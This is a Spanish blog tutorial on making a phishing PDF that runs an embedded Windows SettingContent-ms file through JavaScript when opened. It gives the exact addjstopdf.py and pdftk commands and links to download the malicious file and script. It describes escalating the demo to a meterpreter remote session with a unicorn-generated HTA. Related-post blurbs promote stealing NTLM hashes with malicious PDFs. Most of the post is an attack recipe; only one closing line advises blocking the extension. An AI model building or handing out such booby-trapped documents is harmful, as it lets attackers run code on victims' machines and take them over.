· Pablo Plaza Martínez · tutoriales  · 2 min read

PDF malicioso en Windows 10 con SettingContent-ms embebido

Ejemplo de phishing en Windows 10 con PDF y un archivo SettingContent-ms embebido, ejecutado automáticamente mediante JavaScript al abrir el documento.

Ejemplo de phishing en Windows 10 con PDF y un archivo SettingContent-ms embebido, ejecutado automáticamente mediante JavaScript al abrir el documento.

PDF malicioso en Windows 10 con SettingContent-ms embebidoEn este post veremos como conseguir la ejecución de comandos en Windows 10 a traves de un phising con un PDF malicioso con un archivo con extensión SettingContent-ms embebido que se ejecutará automáticamente mediante JavaScript. Crearemos el PDF malicioso y haremos una simple prueba sin usar el Adobe Acrobat DC

Creación del PDF

Lo primero que debemos de hacer para realizar el ataque de phising es crear un PDF comun.

Para conseguir la ejecución de comandos mediante la apertura del PDF utilizaremos un archivo malicioso con extensión SettingContent-ms. Estos archivos son archivos de configuración de Windows que podemos conseguir en nuestro sistema. Simplemente modificando la etiqueta conseguiremos ejecutar lo que deseamos por ejemplo la calculadora.

Descarga: https://ironHackers.es/Shared/malicius.settingcontent-ms
El siguiente paso sera incluir en el PDF un javascript que se ejecutará al abrir el PDF y hará que se abra automáticamente nuestro archivo malicioso. Para ello utilizaremos un script de python.

Descarga: https://ironHackers.es/Shared/addJStoPDF.zip
La inclusión del Javascript se hará de la siguiente manera:

 python addjstopdf.py -j "this.exportDataObject({cName: \"malicius.settingcontent-ms\", nLaunch: 2});" Poc.pdf PocJS.pdf 

Ahora una vez añadido el Javascript tendremos que añadir el archivo al PDF, para ello utilizaremos la herramienta PDFTK Para instalarla utilizaremos apt.

 apt-get install pdftk 

Una vez instalada la usaremos para añadir el archivo malicioso a nuestro PDF.

 pdftk PocJS.pdf attach_file malicius.settingcontent-ms outfile PocFinal.pdf 

Una vez obtenido el archivo PocFinal.pdf ya podemos probar su funcionamiento.

Pruebas en el objetivo

Para la prueba hostearemos nuestro PDF malicioso en Kali y lo descargaremos desde la máquina de objetivo.

Una vez ejecutado obtenemos la ejecución de la calculadora. A partir de esta prueba es facil evolucionarla hacia una conexion remota editando el archivo malicioso. Por ejemplo haremos la prueba con un ataque con HTA malicioso generado por unicorn. Nuestro archivo malicioso con extensión SettingContent-ms quedará de esta manera:

De la misma manera crearemos el PDF malicioso y lo hostearemos con un SimpleHTTPServer del cual lo descargaremos en la máquina objetivo.

Como vemos hemos conseguido obtener una sesión de meterpreter a través de la ejecución de un PDF.
Los archivos SettingContent-ms son un reciente descubrimiento y aunque Windows Defender en sus ultimas actualizaciones controla su ejecución como archivo malicioso posiblemente existan maneras de saltarse ese control asi que es recomendable bloquear la ejecución de estas extensiones o implantar una pólitica estricta para estos archivos.

Herramientas:
PDFTK, adJStoPDF.py

Referencias:

Back to Blog

Related Posts

View All Posts »
Stealing Windows NTLM Hashes with a Malicious PDF

Stealing Windows NTLM Hashes with a Malicious PDF

Practical guide to generating a malicious PDF that, when opened in Windows, forces NTLM authentication and captures the NET-NTLMv2 hash. Includes generation with modern tools, cracking with hashcat, and use of psexec. Updated with best practices and current alternatives.

Robando hashes NTLM de Windows mediante un PDF malicioso

Robando hashes NTLM de Windows mediante un PDF malicioso

Guía práctica para generar un PDF malicioso que, al abrirse en Windows, fuerza una autenticación NTLM y captura el hash NET-NTLMv2. Incluye generación con herramientas modernas, cracking con hashcat y uso de psexec. Actualizado con mejores prácticas y alternativas actuales.